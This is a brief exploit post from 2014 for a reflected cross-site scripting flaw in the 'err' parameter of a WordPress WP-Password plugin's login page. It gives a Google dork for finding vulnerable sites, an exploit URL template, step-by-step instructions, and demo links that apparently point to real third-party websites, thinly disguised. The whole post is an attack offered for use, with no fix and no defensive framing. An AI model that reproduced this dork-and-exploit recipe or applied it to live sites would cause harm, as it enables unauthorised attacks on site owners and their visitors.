title: WordPress WP-Password Plugin XSS Vulnerability
Author: Arash Cyber
date: 2/15/2014
Category: WebApp
Google Dork: inurl:”/wp-content/plugins/wp-password/login.php”
Tested On: Windows – Linux
Site: Attacker-Team.org

# Type: XSS Vulnerability
# Exploit: http://Site.com/{Path}/wp-content/plugins/wp-password/login.php?err={Your Text}
# Explaination: Copy The Dork In Google – Open A Site – Delete All Texts After login.php
Copy This Code At The End Of The Url: ?err={Your Text} – And End 😀

Demo:
-http://fukushXimaboys.com/wp-content/plugins/wp-password/login.php?err=Your Text
-http://wakayXama-jc.net/2012/wp-content/plugins/wp-password/login.php?err=Your Text